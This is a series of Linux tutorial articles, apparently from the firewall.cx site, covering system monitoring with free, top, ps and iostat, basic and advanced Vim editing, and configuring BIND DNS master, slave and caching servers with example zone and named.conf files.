For the GUI, there is a graphical tool called ‘Baobab’ for checking the disk usage. It shows how a disk is being used and displays the information in the form of either multicolored concentric rings or boxes.

Monitoring Memory Usage

RAM, or memory, is used to run the currently active applications. Under Linux, there are a number of ways you can check the used memory space -- both in static and dynamic conditions.

For a static snapshot of the memory, use ‘free -m’ which results in the output:

$ free -m
             total       used       free     shared    buffers     cached
Mem:          1998       1896        101          0         59        605
-/+ buffers/cache:        1231        766
Swap:          290         77        213

Here, the total amount of RAM is depicted in megabytes (MB), along with cache and swap. A somewhat more detailed output can be obtained by the command ‘vmstat’:

root@gateway [~]#  vmstat
procs -----------memory---------- ---swap-- -----io---- --system-- ------cpu-----
 r  b   swpd   free   buff  cache   si   so    bi    bo   in   cs us sy id wa st
 1  0      0 767932      0      0    0    0    10     3    0    1  2  0 97  0  0
root@gateway [~]#

However, if you want to examine dynamically what is happening to the memory, you have to use 'top' or 'htop'. Both will give you a picture of which process is using what amount of memory, updated periodically. Both 'top' and 'htop' also show the CPU utilization, the running tasks and their PIDs. Whereas 'top' has a purely numerical display, 'htop' is somewhat more colorful and has a semi-graphic look, with a list of command menus at the bottom for setup and specific operations.

root@gateway [~]# top

top - 01:04:18 up 81 days, 11:05,  1 user,  load average: 0.08, 0.28, 0.33
Tasks:  47 total,   1 running,  45 sleeping,   0 stopped,   1 zombie
Cpu(s):  2.4%us,  0.4%sy,  0.0%ni, 96.7%id,  0.5%wa,  0.0%hi,  0.0%si,  0.0%st
Mem:    1048576k total,   261740k used,   786836k free,        0k buffers
Swap:         0k total,        0k used,        0k free,        0k cached

  PID    USER     PR   NI  VIRT  RES  SHR S  %CPU   %MEM    TIME+    COMMAND                                
    1   root      15   0  10372  736  624 S  0.0    0.1     1:41.86   init                                   
 5407   root      18   0  12424  756  544 S  0.0    0.1     0:13.71   dovecot                                
 5408   root      15   0  19068 1144  892 S  0.0    0.1     0:12.09   dovecot-auth                           
 5416   dovecot   15   0  38480 2868 2008 S  0.0    0.3     0:10.80   pop3-login                             
 5417   dovecot   15   0  38468 2880 2008 S  0.0    0.3     0:49.31   pop3-login                             
 5418   dovecot   16   0  38336 2700 2020 S  0.0    0.3     0:01.15   imap-login                             
 5419   dovecot   15   0  38484 2856 2020 S  0.0    0.3     0:04.69   imap-login                             
 9745   root      18   0  71548  22m 1400 S  0.0    2.2     0:01.39   lfd                                    
11501  root       15   0   160m  67m 2824 S  0.0    6.6     1:32.51   spamd                                  
23935  firewall   18   0  15276 1180  980 S  0.0    0.1     0:00.00   imap                                   
23948  mailnull   15   0  64292 3300 2620 S  0.0    0.3     0:05.62   exim                                   
23993  root       15   0   141m  49m 2760 S  0.0    4.8     1:00.87   spamd                                  
24477  root       18   0  37480 6464 1372 S  0.0    0.6     0:04.17   queueprocd                             
24494  root       18   0  44524 8028 2200 S  0.0    0.8     1:20.86   tailwatchd                             
24526  root       19   0  92984  14m 1820 S  0.0    1.4     0:00.00   cpdavd                                 
24536  root       33  18  23892 2556  680 S  0.0    0.2     0:02.09   cpanellogd                             
24543  root       18   0  87692  11m 1400 S  0.0    1.1     0:33.87   cpsrvd-ssl                             
25952  named      22   0   349m 8052 2076 S  0.0    0.8    20:17.42   named                                  
26374  root       15  -4  12788  752  440 S  0.0    0.1     0:00.00   udevd                                  
28031  root       17   0  48696 8232 2380 S  0.0    0.8     0:00.07   leechprotect                           
28038  root       18   0  71992 2172  132 S  0.0    0.2     0:00.00   httpd                                  
28524  root       18   0  90944 3304 2584 S  0.0    0.3     0:00.01   sshd

For a graphical display of how the memory is being utilized, the Gnome System Monitor gives a detailed picture. There are other system monitors available under various window managers in Linux.

Monitoring CPU(s)

You may have a single-core, dual-core, or quad-core CPU in your system. To see what each CPU is doing, or how two CPUs are sharing the load, you have to use 'top' or 'htop'. These command-line applications show the percentage of each CPU being utilized. You can also see process statistics, memory utilization, uptime, load average, CPU status, process counts, and memory and swap space utilization statistics.

Similar statistics may be seen using command-line tools such as 'mpstat', which is part of a package called 'sysstat'. You may have to install 'sysstat' on your system, since it may not be installed by default. Once installed, you can monitor a variety of parameters, for example compare the per-CPU utilization of an SMP (multi-processor) system.
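
As a quick sketch (the installation command depends on your distribution, and the interval/count values are only examples), per-CPU statistics can be displayed like this:

root@gateway [~]# yum install sysstat        # or: apt-get install sysstat
root@gateway [~]# mpstat -P ALL 2 5          # all CPUs, refreshed every 2 seconds, 5 reports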

Finding out if any specific process is hogging the CPU needs a little more command line instruction such as:

$ ps -eo pcpu,pid,user,args | sort -r -k1 | less

OR

$ ps -eo pcpu,pid,user,args | sort -k 1 -r | head -10

Similar output can be obtained by using the command ‘iostat’ as root:

root@gateway [~]# iostat -xtc 5 3
Linux 2.6.18-028stab094.3 (gateway.firewall.cx)         01/11/2012

Time: 01:13:15 AM
avg-cpu:  %user   %nice   %system  %iowait  %steal   %idle
          2.38    0.01     0.43     0.46    0.00     96.72

Time: 01:13:20 AM
avg-cpu:  %user   %nice   %system  %iowait  %steal   %idle
          3.89    0.00     0.26     0.09     0.00     95.77

Time: 01:13:25 AM
avg-cpu:  %user   %nice   %system  %iowait  %steal   %idle
          0.31    0.00    0.15      1.07     0.00     98.47

This displays three reports at five-second intervals. Note that the first report shows averages since the last reboot, while each subsequent report covers the interval since the previous one.

CPU usage under GUI is very well depicted by the Gnome System Monitor and other system monitoring applications. These are also useful for monitoring remote servers. Detailed memory maps can be accessed, signals can be sent and processes controlled remotely.

linux-system-monitoring-1

Gnome-System-Monitor

Linux Processes

How do you know what processes are currently running in your Linux system? There are innumerable ways of getting to see this information. The handiest applications are the old faithfuls - ‘top’ and ‘htop’. They will give a real-time image of what is going on under the hood. However, if you prefer a more static view, use ‘ps’. To see all processes try ‘ps -A’ or ‘ps -e’:

root@gateway [~]# ps -e
PID TTY          TIME CMD
    1 ?          00:01:41 init
 3201 ?        00:00:00 leechprotect
 3208 ?        00:00:00 httpd
 3360 ?        00:00:00 httpd
 3490 ?        00:00:00 httpd
 3530 ?        00:00:00 httpd
 3532 ?        00:00:00 httpd
 3533 ?        00:00:00 httpd
 3535 ?        00:00:00 httpd
 3575 ?        00:00:00 httpd
 3576 ?        00:00:00 httpd
 3631 ?        00:00:00 imap
 3694 ?        00:00:00 httpd
 3705 ?        00:00:00 httpd
 3770 ?        00:00:00 imap
 3774 pts/0    00:00:00 ps
 5407 ?        00:00:13 dovecot
 5408 ?        00:00:12 dovecot-auth
 5416 ?        00:00:10 pop3-login
 5417 ?        00:00:49 pop3-login
 5418 ?        00:00:01 imap-login
 5419 ?        00:00:04 imap-login
 9745 ?        00:00:01 lfd
11501 ?        00:01:35 spamd
23948 ?        00:00:05 exim
23993 ?        00:01:00 spamd
24477 ?        00:00:04 queueprocd
24494 ?        00:01:20 tailwatchd
24526 ?        00:00:00 cpdavd
24536 ?        00:00:02 cpanellogd
24543 ?        00:00:33 cpsrvd-ssl
25952 ?        00:20:17 named
26374 ?        00:00:00 udevd
28524 ?        00:00:00 sshd
28531 pts/0    00:00:00 bash
29834 ?        00:00:00 sshd
30426 ?        00:11:27 syslogd
30429 ?        00:00:00 klogd
30473 ?        00:00:00 xinetd
30485 ?        00:00:00 mysqld_safe
30549 ?        1-15:07:28 mysqld
32158 ?        00:06:29 httpd
32166 ?        00:12:39 pure-ftpd
32168 ?        00:07:12 pure-authd
32181 ?        00:01:06 crond
32368 ?        00:00:00 saslauthd
32373 ?        00:00:00 saslauthd

'ps' is an extremely powerful and versatile command; you can learn more about its options with 'ps --h' (a couple of handy sorting examples follow the help listing below):

root@gateway [~]# ps --h
********* simple selection *********  ********* selection by list *********
-A all processes                         -C by command name
-N negate selection                      -G by real group ID (supports names)
-a all w/ tty except session leaders     -U by real user ID (supports names)
-d all except session leaders            -g by session OR by effective group name
-e all processes                         -p by process ID
T  all processes on this terminal        -s processes in the sessions given
a  all w/ tty, including other users     -t by tty
g  OBSOLETE -- DO NOT USE                -u by effective user ID (supports names)
r  only running processes                 U  processes for specified users
x  processes w/o controlling ttys         t  by tty
*********** output format **********  *********** long options ***********
-o,o user-defined   -f full               --Group --User --pid --cols --ppid
-j,j job control    s  signal             --group --user --sid --rows --info
-O,O preloaded     -o  v  virtual memory  --cumulative --format --deselect
-l,l long              u  user-oriented   --sort --tty --forest --version
-F   extra full        X  registers       --heading --no-heading --context
                    ********* misc options *********
-V,V  show version     L  list format codes   f  ASCII art forest
-m,m,-L,-T,H  threads  S  children in sum    -y change -l format
-M,Z  security data    c  true command name  -c scheduling class
-w,w  wide output      n  numeric WCHAN,UID  -H process hierarchy
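
For instance, assuming a procps version of 'ps' that supports the --sort option (most modern distributions do), the earlier pipe through 'sort' can be replaced with ps's own sorting:

$ ps -eo pid,user,%mem,%cpu,args --sort=-%mem | head -11     # top 10 processes by memory usage
$ ps -eo pid,user,%cpu,%mem,args --sort=-%cpu | head -11     # top 10 processes by CPU usage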

  • Hits: 56688

Linux VIM / Vi Editor - Tutorial - Basic & Advanced Features

When you are using Vim, you want to know three things - getting in, moving about and getting out. Of course, while doing these three basic operations, you would like to do something meaningful as well. So, we start with getting into Vim.

Assuming that you are in a shell, or in the command line, you can simply type 'vim' and the application starts:

root@gateway [~]# vim

 Exiting the VIM application is easily accomplished: type ':' followed by a 'q', hit the 'Enter' key and you are out:

~
~                                         VIM - Vi IMproved
~
~                                          version 7.0.237
~                                     by Bram Moolenaar et al.
~                                 Modified by <This email address is being protected from spambots. You need JavaScript enabled to view it.>
~                            Vim is open source and freely distributable
~
~                                   Become a registered Vim user!
~                          type  :help register<Enter>   for information
~
~                          type  :q<Enter>               to exit        
~                          type  :help<Enter>  or  <F1>  for on-line help
~                          type  :help version7<Enter>   for version info
~
:q
root@gateway [~]#

 That's how you start and stop the Vim car. Now, let's try to learn how to steer the car.

You can move around in Vim, using the four arrow keys. However, a faster way is to use the 'h', 'j', 'k' and 'l' keys. This is because the keys are always under your right hand and you do not need to move your hand to access them as with the arrow keys. The 'j' moves the cursor down, 'k' moves it up. The 'h' key moves the cursor left, while 'l' moves it to the right. That's how you steer the Vim car.

You can edit a file using Vim. You either have an existing file, or you make a new one. If you start with 'vim filename', you edit the file represented by the 'filename'. If the file does not exist, Vim will create a new file. Now, if you want to edit a file from within Vim, open the file using ':e filename'. If this file is a new file, Vim will inform you. You can save the file using the ':w' command.

If you need to search the file you are editing for a specific word or string, simply type forward-slash '/' followed by the word you would like to search for. After hitting 'enter', VIM will automatically take you to the first match.  By typing forward-slash '/' again followed by 'enter' it will take you to the next match.

To write or edit something inside the file, press 'i' and Vim will enter 'Insert' mode. Once you have finished, you can exit Insert mode by pressing the 'Esc' key, and discard any unsaved changes by reloading the file with ':e!'. You also have a choice to either save the file using the ':w' command, or save & quit by using ':wq'. Optionally, you can abort the changes and quit with ':q!'.

If you have made a change and want to quit without explicitly informing Vim whether you want to save the file or not, Vim will rightly complain, but will also guide you to use the '!'.

Command Summary

Start VIM:  vim
Quit Program: :q
Move Cursor: Arrow keys or j, k, h, l (down, up, left, right)
Edit file: vim filename
Open file (within VIM):  :e filename  e.g   :e bash.rc
Search within file: /'string'  e.g /firewall  
Insert mode:  i
Save file:   :w
Save and Quit:  :wq
Abort and Quit:  :q!

Advanced Features of VIM

Now that you know your way in and out of Vim, and how to edit a file, let us dig a little deeper. For example, how can you add something at the end of a line, when you are at its starting point? Well, one way is to keep the right arrow pressed, until you get to the end. A faster way is 'Shift+a' and you are at the end of the line. To go to the beginning of the line, you must press 'Shift+i'. Make sure you are out of the 'Insert' mode shown at the bottom; use the 'Esc' for this.

Suppose you are in the middle of a line and would like to start inserting text into a new line just below it. One way would be to move the cursor right and hit 'Enter' when you reach the end. A faster way is to enter 'o', which opens a new line below the cursor and puts you in Insert mode. If you enter 'Shift+o' (a capital 'O') instead, the new line is created above the cursor. Don't forget to exit the 'Insert' mode by pressing 'Esc'.

How do you delete lines? Hold the 'delete' button and wait until the lines are gone. How can you do it faster? Use the 'd' command. If you want to delete 10 lines below your cursor position and the current line, try 'd10j'. To delete 5 lines above your current position and the current line, try 'd5k'. Note the 'j' and 'k' (down, up) covered in our previous section. If you’ve made a mistake, recover it with the undo command, 'u'. Redo it with 'Ctrl+r'.

Tip 1: To delete the current line alone, use 'dd'.

Tip 2: To delete the current line and the one below it, use 'd2d'.

Did you know you can have windows in Vim? Oh yes, you can. Try 'Ctrl+w+s' if you want a horizontal split, and 'Ctrl+w+v' if you want a vertical split. Move from one window to another by using 'Ctrl+w+w'. After you have finished traveling through all the windows, close them one by one using 'Ctrl+w+c'.

 Here is an example with four (4) windows within the Vim environment:

linux-vim-editor-1

You can record macros in Vim and run them. To record a macro into register 'm', start recording with 'qm'. To stop recording, hit 'q'. To play the macro, press '@m'. To rerun the last played macro, press '@@'. Macros are most useful when you need to repeat the same sequence of commands within a file.

Vim also has extensive help facilities. To learn about a command, say 'e', type ':h e' and hit 'Enter'. You will see how the command 'e' can be useful. To come back to where you were, type ‘:q’ and then ‘Enter’. Incidentally, typing ':he' and 'Enter' will open up the general help section. Come back with the same ':q'.

As an example, here's what we got when we typed ':h e' (that's an ":" + "h" + space + "e"):

linux-vim-editor-2

When we typed ':he', we were presented with the main help file of VIM:

linux-vim-editor-3

Command Summary

Move cursor to end of line:  Shift+a
Move cursor to beginning of line:  Shift+i
Delete current line: dd
Delete 10 lines below cursor position: d10j
Delete 5 lines above cursor position: d5k
Undo:  u
Redo: Ctrl+r
Window Mode - Horizontal:  Ctrl+w+s
Window Mode - Vertical Split:  Ctrl+w+v
Move between windows: Ctrl+w+w
Close Window: Ctrl+w+c
Record Macro (into register m):  qm   (stop recording with q)
Play Macro:  @m   (repeat last macro with @@)
Help:    :h 'command'  from within VIM. e.g  :h e



  • Hits: 58982

Linux BIND DNS - Part 6: Linux BIND - DNS Caching

In the previous articles, we spoke about the Internet Domain Hierarchy and explained how the ROOT servers are the DNS servers that contain all the information about the authoritative DNS servers for the domains immediately below them, e.g. firewall.cx, microsoft.com. In fact, when a request is passed to any of the ROOT DNS servers, they will redirect the client to the appropriate authoritative DNS server, that is, the DNS server in charge of the domain.

For example, if you're trying to resolve firewall.cx and your machine contacts a ROOT DNS server, the server will point your computer to the DNS server in charge of the .CX domain, which in turn will point your computer to the DNS server in charge of firewall.cx, currently the server with IP address 74.200.90.5.

Understanding DNS Caching and its Implications

As you can see, a simple DNS request can become quite a task to resolve successfully. This also means that there's a fair bit of traffic generated in order to complete the procedure. Whether you're paying a flat rate to your ISP or your company has a permanent connection to the Internet, the truth is that someone ends up paying for all these DNS requests! The above example was only for one computer trying to resolve one domain. Try to imagine a company that has 500 computers connected to the Internet or an ISP with 150,000 subscribers - now you're starting to get the big picture!

All that traffic is going to end up on the Internet if something isn't done about it, not to mention who will be paying for it!

This is where DNS Caching comes in. If we're able to cache all these requests, then we don't need to ask the ROOT DNS or any other external DNS server as long as we are trying to resolve previously visited sites or domains, because our caching system would "remember" all the previous domains we visited (and therefore resolved) and would be able to give us the IP Address we're looking for!

Note: You should keep in mind that when you install BIND, by default it's set up to be a DNS Caching server, so all you need to do is start up the service, which is called 'named'.
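
As a rough sketch (the exact service command depends on your distribution, and 'dig' comes from the BIND utilities), starting the service and confirming that caching works could look like this:

root@gateway [~]# service named start                  # or: /etc/init.d/named start
root@gateway [~]# dig @127.0.0.1 www.linux.org         # first query - resolved recursively
root@gateway [~]# dig @127.0.0.1 www.linux.org         # repeat - answered from the cache

Comparing the 'Query time' value of the two responses should show the second query being answered almost instantly from the cache.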

Almost all Internet name servers use name caching to optimise search costs. Each of these servers maintains a cache which contains all recently used names as well as a record of where the mapping information for that name was obtained. When a client (e.g your computer) asks the server to resolve a domain, the server will first check to see whether it has authority (meaning if it is in charge) for that domain. If not, the server checks its cache to see if the domain is in there and it will find it if it's been recently resolved.

Assuming that the server does find it in the cache, it will take the information and pass it on to the client but also mark the information as a nonauthoritative binding, which means the server tells the client "Here is the information you required, but keep in mind, I am not in charge of this domain".

The information can be out of date and, if it is critical for the client that it does not receive such information, it will then try to contact the authoritative DNS server for the domain and obtain the up to date information it requires.

DNS Caching Does Come with its Problems!

As you can clearly see, DNS caching can save you a lot of money, but it comes with its problems!

Caching works well in the domain name system because name-to-address bindings change infrequently. However, they do change. If servers cached the information the first time it was requested and never updated it, the entries in the cache could become incorrect.

The Solution To DNS Caching Problems

Fortunately there is a solution that will prevent DNS servers from giving out incorrect information. To ensure that the information in the cache is correct, every DNS server will time each entry and dispose of the ones that have exceeded a reasonable time. When a DNS server is asked for the information after it has removed the entry from its cache, it must go back to the authoritative source and obtain it again.

Whenever an authoritative DNS server responds to a request, it includes a Time To Live (TTL) value in the response. This TTL value is set in the zone files as you've probably already seen in the previous pages.

If you manage a DNS server and are planning changes in the next couple of weeks - such as redelegating (moving) your domain to another hosting company, changing the IP address of your website, or changing mail servers - then it's a good idea to lower your TTL to a very small value well before the scheduled change. The reason is that any DNS server that queries your domain, your website or any other resource record belonging to your domain will cache that data for as long as the TTL specifies.

By decreasing the $TTL value to, for example, 1 hour, you ensure that all DNS data from your domain expires in the requester's cache 1 hour after it was received. If you don't do this, the servers and clients (including simple home users) that access your site or domain will cache the DNS data for the currently set time, which is normally around 3 days. Not a good thing when you make a big change :)

So keep all the above in mind when you're about to perform a change in the DNS server zone files: a couple of days before making the change, decrease the $TTL to a reasonable value of no more than a few hours, and once you complete the change, be sure to set it back to what it was.
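
A quick way to confirm what TTL requesters are actually being handed (assuming the 'dig' utility from the BIND tools is installed) is to query the records directly; the second column of each answer is the TTL in seconds:

root@gateway [~]# dig firewall.cx A +noall +answer
root@gateway [~]# dig firewall.cx MX +noall +answer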

We hope this has given you an insight into how you can save yourself or your company money, and avoid the problems that occur when changing fields and values in the DNS zone files!

  • Hits: 25688

Linux BIND DNS - Part 5: Configure Secondary (Slave) DNS Server

Setting up a Secondary (or Slave) DNS server is much easier than you might think. All the hard work is done when you set up the Master DNS server by creating your database zone files and configuring the named.conf file.

If you are wondering how it is that the Slave DNS server is so easy to set up, remember that all the Slave DNS server does is update its database from the Master DNS server (a zone transfer). Almost all the files we configure on the Master DNS server are simply copied to the Slave DNS server, which acts as a backup in case the Master DNS server fails.

Setting Up The Slave DNS Server

Let's have a closer look at the requirements for getting our Slave DNS server up and running.

Keeping in mind that the Slave DNS server is on another machine, we are assuming that you have downloaded and successfully installed the same BIND version on it. We need to copy 3 files from the Master DNS server, make some minor modifications to one file and launch our Slave DNS server.... the rest will happen automatically :)

So which files do we copy?

The files required are the following:

  • named.conf (our configuration file)
  • named.ca or db.cache (the root hints file, contains all root servers)
  • named.local (local loopback for the specific DNS server so it can direct traffic to itself)

The rest of the files, which are our db.DOMAIN (db.firewall.cx for our example) and db.in-addr.arpa (db.192.168.0 for our example), will be transferred automatically (zone transfer) as soon as the newly brought up Slave DNS server contacts the Master DNS server to check for any zone files.

How do I copy these files?

There are plenty of ways to copy the files between servers. The method you will use depends on where the servers are located. If, for example, they are right next to you, you can simply use a floppy disk to copy them or use ftp to transfer them.

If you're going to try to transfer them over a network, and especially over the Internet, then you might consider something more secure than ftp. We would recommend you use SCP, which stands for Secure Copy and uses SSH (Secure SHell).

SCP can be used on its own (without first opening an interactive SSH session) as long as there is an SSH server running on the other side. SCP will allow you to transfer files over an encrypted connection and is therefore preferred for sensitive files, plus you get to learn a new command :)

The command used is as follows: scp localfile-to-copy username@remotehost:destination-folder. Here is the command line we used from our Gateway server (Master DNS): scp /etc/named.conf root@voyager:/etc/

Keep in mind that the files we copy are placed in the same directory as on the Master DNS server. Once we have copied all three files we need to modify the named.conf file. To make things simple, we are going to show you the original file copied from the Master DNS and the modified version which now sits on the Slave DNS server.

The Master named.conf file is a clear cut/paste from the "Common BIND Files" page, whereas the Slave named.conf has been modified to suit our Slave DNS server. To help you identify the changes, we have marked them in red:

Master named.conf file

options {
directory "/var/named";

};


// Root Servers
zone "." IN {
type hint;
file "named.ca";
};

// Entry for Firewall.cx - name to ip mapping
zone "firewall.cx" IN {
type master;
file "db.firewall.cx";
};


// Entry for firewall.cx - ip to name mapping
zone "0.168.192.in-addr.arpa" IN {
type master;
file "db.192.168.0";
};

// Entry for Local Loopback
zone "0.0.127.in-addr.arpa" IN {
type master;
file "named.local";
};

 

Slave named.conf file

options {
directory "/var/named";

};


// Root Servers
zone "." IN {
type hint;
file "named.ca";
};

// Entry for Firewall.cx - name to ip mapping
zone "firewall.cx" IN {
type slave;
file "bak.firewall.cx";
masters { 192.168.0.10 ; } ;
};

// Entry for firewall.cx - ip to name mapping
zone "0.168.192.in-addr.arpa" IN {
type slave;
file "bak.192.168.0";
masters { 192.168.0.10 ; } ;
};

// Entry for Local Loopback
zone "0.0.127.in-addr.arpa" IN {
type master;
file "named.local";
};

As you can see, most of the slave's named.conf file is similar to the master's, except for a few fields and values, which we are going to explain right now.

The type value is now slave, and that's pretty logical since it tells the DNS server whether it's a master or a slave.

The file "bak.firewall.cx"; entry basically tells the server what name to give the zone files once they are transfered from the master dns server. We tend to follow the bak.domain format because that's the way we see the slave server, a backup dns server. It is not imperative to use this name scheme, you can change it to whatever you wish. Once the server is up and running, you will see these files soon appear in the /var/named directory.

Lastly, the masters {192.168.0.10}; entry informs our slave server of the IP address of the master DNS server it needs to contact to retrieve the zone files. That's all there is to setting up the slave DNS server! As we mentioned, once the master is set up, the slave is a piece of cake because it involves very few changes.

Our Final article covers the setup of  Linux BIND DNS Caching.

  • Hits: 50696

Linux BIND DNS - Part 4: Common BIND Files - Named.local, named.conf, db.127.0.0 etc

So far we have covered in great detail the main files required for the firewall.cx domain. These files, which we named db.firewall.cx and db.192.168.0, define all the resource records and hosts available in the firewall.cx domain.

We will be analysing these files in this article, to help you understand why they exist and how they fit into the big picture:

Our Common Files

There are 3 common files that we're going to look at. The first two files' contents change slightly depending on the domain, because they must be aware of the various hosts and the domain name for which they are created. The third file in the list below is always the same amongst all DNS servers, and we will explain more about it later on.

So here are our files:

  • named.local or db.127.0.0
  • named.conf
  • named.ca or db.cache

The Named.local File

The named.local file, or db.127.0.0 as some might call it, is used to cover the loopback network. Since no one was given the responsibility for the 127.0.0.0 network, we need this file to make sure there are no errors when the DNS server needs to direct traffic to itself (127.0.0.1 IP Address - Loopback).

When installing BIND, you will find this file in your caching example directory: /var/named/caching-example, so you can either create a new one or modify the existing one to meet your requirements.

The file is no different than our example db.addr file we saw previously:

$TTL 86400

0.0.127.in-addr.arpa. IN SOA voyager.firewall.cx. admin.firewall.cx. (

                1 ; Serial
                3h ; Refresh after 3 hours
                1h ; Retry after 1 hour
                1w ; Expire after 1 week
                1h ) ; Negative caching TTL of 1 hour

 

0.0.127.in-addr.arpa. IN NS voyager.firewall.cx.
0.0.127.in-addr.arpa. IN NS gateway.firewall.cx.
1.0.0.127.in-addr.arpa. IN PTR localhost.

That's all there is for named.local file !

The Named.ca File

The named.ca file (also known as the "root hints file") is created when you install BIND and doesn't need to be modified unless you have an old version of BIND or it's been a while since you installed it.

The purpose of this file is to let your DNS server know about the Internet ROOT servers. There is no point displaying all of the file's content because it's quite big, so we will show the entry for one ROOT server to give you an idea of what it looks like:

; last update: Aug 22, 2011
; related version of root zone: 1997082200
; formerly NS.INTERNIC.NET

. 3600000 IN NS A.ROOT-SERVERS.NET.
A.ROOT-SERVERS.NET. 3600000 A 198.41.0.4
The domain name "." refers to the root zone and the value 3600000 is the explicit time to live (TTL) for the records in the file, but it is sometime ignored by DNS clients.

The rest of the entries are self-explanatory. If you want to grab a new copy of the root hints file, you can ftp to ftp.rs.internic.net (198.41.0.6) and log on anonymously; there you will find the latest, up-to-date version.
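
Alternatively, a commonly used way to rebuild the root hints file is to query one of the root servers directly with 'dig' (adjust the output path to wherever your named.ca or db.cache lives - this is just a sketch):

root@gateway [~]# dig @a.root-servers.net . NS +norec > /var/named/named.ca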

The Named.conf File

The named.conf file is usually located in the /etc directory and is the key file that ties all the zone data files together and lets the DNS server know where they are located in the system. This file is automatically created during the installation but you must edit it in order to add new entries that will point to any new zone files you have created.

Let's have a close look at the named.conf file and explain:

options {
directory "/var/named";

};

// Root Servers
zone "." IN {
type hint;
file "named.ca";
};

// Entry for Firewall.cx - name to ip mapping
zone "firewall.cx" IN {
type master;
file "db.firewall.cx";
};

// Entry for Firewall.cx - ip to name mapping
zone "0.168.192.in-addr.arpa" IN {
type master;
file "db.192.168.0";
};

// Entry for Local Loopback
zone "0.0.127.in-addr.arpa" IN {
type master;
file "named.local";
};

At first glance it might seem a maze, but it's a lot simpler than you think. Break down each paragraph and you can see clearly the pattern that follows.

Starting from the top, the options section simply defines the directory where all the files to follow are located, the rest are simply comments.

The root servers section tells the DNS server where to find the root hints file, which contains all the root servers.

Next up is the entry for our domain firewall.cx: we let the DNS server know which file contains all the zone entries for this domain, and let it know that it will act as a master DNS server for the domain. The same applies for the entry that follows, which contains the IP-to-name mappings; this is the 0.168.192.in-addr.arpa zone.

The last entry is required for the local loopback. We tell the DNS server which file contains the local loopback entries.

Notice the "IN" class that is present in each section? If we accidentally forget to include it in our zone files, it wouldn't matter because the DNS server will automatically figure out the class from our named.conf file. It's imperative not to forget the "IN" (Internet) class in the named.conf, whereas it really doesnt matter if you don't put it in the zone files. It's good practice still to enter it in the zone files as we did, just to make sure you don't have any problems later on.

And that ends our discussion for the common DNS (BIND) files.  Next up is the configuration of our Linux BIND Slave/Secondary DNS server.

 

 

  • Hits: 30817

Linux BIND DNS - Part 3: Configuring The db.192.168.0 Zone Data File

The db.192.168.0 zone data file is the second file we need to create and configure for our BIND DNS server. As outlined in the DNS-BIND Introduction, this file's purpose is to provide the IP Address -to- name mappings. Note that this file is to be placed on the Master DNS server for our domain.

Constructing The db.192.168.0 File

While we start to construct the file, you will notice many similarities with our previous file. Most resource records have already been covered and explained in our previous articles, and therefore we will not repeat them on this page.

The first line is our $TTL control statement, followed by the Start Of Authority (SOA) resource record:

$TTL 86400

0.168.192.in-addr.arpa. IN SOA voyager.firewall.cx. admin.firewall.cx. (

                     1 ; Serial
                     3h ; Refresh after 3 hours
                     1h ; Retry after 1 hour
                     1w ; Expire after one week
                     1h ) ; Negative Caching TTL of 1 hour
As you can see, everything above, except the first column of the first line, is identical to the db.firewall.cx file. The "0.168.192.in-addr.arpa" entry is our IP network in reverse order. The trick to figuring out your own in-addr.arpa entry is to simply take your network address, reverse it, and add ".in-addr.arpa." at the end.

Name server resource records are next, followed by the PTR resource records that create our IP Address-to-name mappings. The syntax is nearly the same as in the db.domain file, but keep in mind that for the name servers we don't enter the full reversed IP Address, only the first 3 octets, which represent the network they belong to:

; Name Servers defined here
0.168.192.in-addr.arpa. IN NS voyager.firewall.cx.
0.168.192.in-addr.arpa. IN NS gateway.firewall.cx.

; IP Address to Name mappings
1.0.168.192.in-addr.arpa. IN PTR admin.firewall.cx.
5.0.168.192.in-addr.arpa. IN PTR enterprise.firewall.cx.
10.0.168.192.in-addr.arpa. IN PTR gateway.firewall.cx.
15.0.168.192.in-addr.arpa. IN PTR voyager.firewall.cx.

 Time to look at the configuration file with all its entries:

$TTL 86400

0.168.192.in-addr.arpa. IN SOA voyager.firewall.cx. admin.firewall.cx. (

                     1 ; Serial
                     3h ; Refresh after 3 hours
                     1h ; Retry after 1 hour
                     1w ; Expire after one week
                     1h ) ; Negative Caching TTL of 1 hour

; Name Servers defined here
0.168.192.in-addr.arpa. IN NS voyager.firewall.cx.
0.168.192.in-addr.arpa. IN NS gateway.firewall.cx.

; IP Address to Name mappings
1.0.168.192.in-addr.arpa. IN PTR admin.firewall.cx.
5.0.168.192.in-addr.arpa. IN PTR enterprise.firewall.cx.
10.0.168.192.in-addr.arpa. IN PTR gateway.firewall.cx.
15.0.168.192.in-addr.arpa. IN PTR voyager.firewall.cx.

This completes the configuration of our db.192.168.0 zone data file.
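
Assuming named has been restarted on the master (192.168.0.15 in our example) with this zone loaded, a quick reverse lookup with 'dig' (part of the BIND utilities) is a handy sanity check:

root@gateway [~]# dig @192.168.0.15 -x 192.168.0.10 +short
gateway.firewall.cx.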

Remember the whole purpose of this file is to provide an IP Address-to-name mapping, which is why we do not use the domain name in front of each line, but the reversed IP Address followed by the in-addr.arpa. entry. Next article deals with the Common Files in Linux BIND DNS.

  • Hits: 49360

Linux BIND DNS - Part 2: Configuring db.domain Zone Data File

It's time to start creating our zone files. We'll follow the standard format, which is given in the DNS RFCs, in order to keep everything neat and less confusing.

First step is to decide on the domain we're using and we've decided on the popular firewall.cx. This means that the first zone file will be db.firewall.cx. Note that this file is to be placed on the Master DNS server for our domain.

We will progressively build our database by populating it step by step and explaining each step we take. At the end of the step-by-step example, we'll grab each step's data and put it all together so we can see how the final version of our file will look. We strongly believe this is the best method of explaining how to create a zone file without confusing the hell out of everyone!

Constructing db.firewall.cx - db.domain

It is important at this point to make it clear that we are setting up a primary DNS server. For a simple DNS caching or secondary name server, the setup is a lot simpler and is covered in the articles to come.

The first entry for our file is the Default TTL - Time To Live. This is defined using the $TTL control statement. $TTL specifies the time to live for all records in the file that follow the statement and don't have an explicit TTL. We are going to set ours to 24 hours - 86400 seconds.

The units used are seconds. An older common TTL value for DNS was 86400 seconds, which is 24 hours. A TTL value of 86400 would mean that, if a DNS record was changed on the authoritative nameserver, DNS servers around the world could still be showing the old value from their cache for up to 24 hours after the change.

Newer DNS methods that are part of a DR (Disaster Recovery) system may have some records deliberately set to an extremely low TTL. For example, a 300 second TTL would help key records expire in 5 minutes, ensuring those records are flushed worldwide quickly. This gives administrators the ability to edit and update records in a timely manner. TTL values are "per record", and setting this value on specific records is normally honored automatically by all standard DNS systems worldwide. Dynamic DNS (DDNS) setups usually have the TTL value set to 5 minutes, or 300 seconds.

